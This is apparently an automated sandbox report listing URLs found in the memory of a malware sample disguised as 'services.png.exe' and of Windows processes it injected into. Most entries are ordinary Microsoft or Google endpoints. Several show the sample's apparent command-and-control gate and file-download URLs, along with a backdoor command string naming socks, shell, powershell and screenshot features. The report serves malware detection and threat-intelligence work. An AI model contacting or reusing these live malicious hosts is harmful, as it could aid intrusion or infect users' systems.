Source: nyheukpo.exe, 00000001.00000003.2181887191.000000000222D000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627714144.00000000040E5000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2466982292.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579575354.00000000040E3000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181579380.0000000002225000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2181692278.000000000222D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://staa.com/cmdserver%COMMANDSERVER%
Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://upx.sourceforge.net.
Source: explorer.exe, 00000006.00000000.1754346669.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3118529688.000000000C964000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ctuser.net;
Source: services.png.exe, services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/webhp
Source: nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/webhpN
Source: services.png.exe, 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2171239086.0000000002810000.00000040.00000400.00020000.00000000.sdmp, services.png.exe, 00000000.00000002.2167883548.0000000000401000.00000020.00000001.01000000.00000003.sdmp, nyheukpo.exe, 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, nyheukpo.exe, 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2627357615.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.1732075330.0000000002221000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2745411292.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, sihost.exe, 00000002.00000003.1732150846.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, sihost.exe, 00000002.00000000.1730300340.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732249367.0000000000910000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1736960492.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000000.1733891566.00000000009A0000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, ctfmon.exe, 00000005.00000003.1738779911.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754241470.000000000C350000.00000040.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/webhpbcsocksshellpowershellscreenshotGlobal
Source: svchost.exe, 00000003.00000000.1732670803.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2952506913.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000003.00000000.1732670803.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2952506913.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: explorer.exe, 00000006.00000002.3133456773.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000006.00000000.1754346669.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3118529688.000000000C893000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.comt
Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 00000006.00000002.3047788765.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000006.00000002.3133456773.000000000CB31000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: SearchApp.exe, 0000000A.00000000.1797938100.0000024340CDC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5
Source: explorer.exe, 00000006.00000000.1740112568.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2933946089.0000000001240000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: TextInputHost.exe, 00000010.00000002.3022957093.0000015545B2B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000006.00000002.3089421963.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1750623185.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.comer
Source: svchost.exe, 00000003.00000002.2950472526.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.coms
Source: explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000004.00000000.1734626691.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2987599996.0000019E297F1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2625696729.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2577799127.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: StartMenuExperienceHost.exe, 00000008.00000002.2943064332.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000000.1767023927.000001B98144E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comcp
Source: SearchApp.exe, 0000000A.00000000.1810927939.0000024B42180000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://gcc.loki.delve.office.com/api
Source: SearchApp.exe, 0000000A.00000000.1810927939.0000024B42180000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://gcchigh.loki.office365.us/api/
Source: svchost.exe, 00000003.00000000.1732650259.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000006.00000002.3047788765.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000006.00000002.3047788765.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1747285438.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.local
Source: svchost.exe, 00000003.00000002.2954582043.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732691844.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.local/
Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net
Source: svchost.exe, 00000003.00000002.2956326778.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000003.00000000.1732710867.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net/
Source: StartMenuExperienceHost.exe, 00000008.00000000.1767108756.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000002.2948083184.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: SearchApp.exe, 0000000A.00000000.1833309113.0000024B447CF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/M365.Access
Source: SearchApp.exe, 0000000A.00000000.1936271503.0000024B59F50000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/User.ReadWrite
Source: SearchApp.exe, 0000000A.00000000.1872838014.0000024B5549B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/owa
Source: explorer.exe, 00000006.00000002.3118529688.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1754346669.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: StartMenuExperienceHost.exe, 00000008.00000002.2943064332.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000008.00000000.1767023927.000001B98144E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comxee
Source: nyheukpo.exe, 00000001.00000002.2981526929.0000000002EAB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturD
Source: nyheukpo.exe, 00000001.00000003.2578341398.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2508191877.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2233840104.0000000000705000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2205551996.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2184984523.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578881496.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626813607.00000000006C0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219902983.00000000006C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/
Source: nyheukpo.exe, 00000001.00000002.3018778650.00000000040E0000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/fi
Source: nyheukpo.exe, 00000001.00000002.2921848434.000000000019C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.ph
Source: nyheukpo.exe, 00000001.00000002.2988344504.000000000326D000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.php
Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.php$N
Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.php2
Source: nyheukpo.exe, 00000001.00000003.2219425215.0000000000705000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2219770749.0000000000705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.php31232859Z
Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.php3N
Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.phpAN
Source: nyheukpo.exe, 00000001.00000003.2233840104.0000000000705000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.phpC:
Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.000000000065E000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.phpN
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.phpl
Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2578341398.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507970917.00000000006B8000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2935128249.00000000006B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/file.phpv
Source: nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.php
Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000002.2946984336.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.php&
Source: nyheukpo.exe, 00000001.00000003.2589353925.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.php-
Source: nyheukpo.exe, 00000001.00000003.2194610287.0000000002227000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.php2N
Source: nyheukpo.exe, 00000001.00000003.2625696729.000000000072B000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2626703014.000000000072B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.php9210ef
Source: nyheukpo.exe, 00000001.00000003.2507855708.000000000072A000.00000004.00000020.00020000.00000000.sdmp, nyheukpo.exe, 00000001.00000003.2507629555.00000000006F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.phpF
Source: nyheukpo.exe, 00000001.00000003.2626813607.00000000006B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.phpO
Source: nyheukpo.exe, 00000001.00000002.2962238651.0000000002223000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://saba.royalreturns.org/gate.phpU
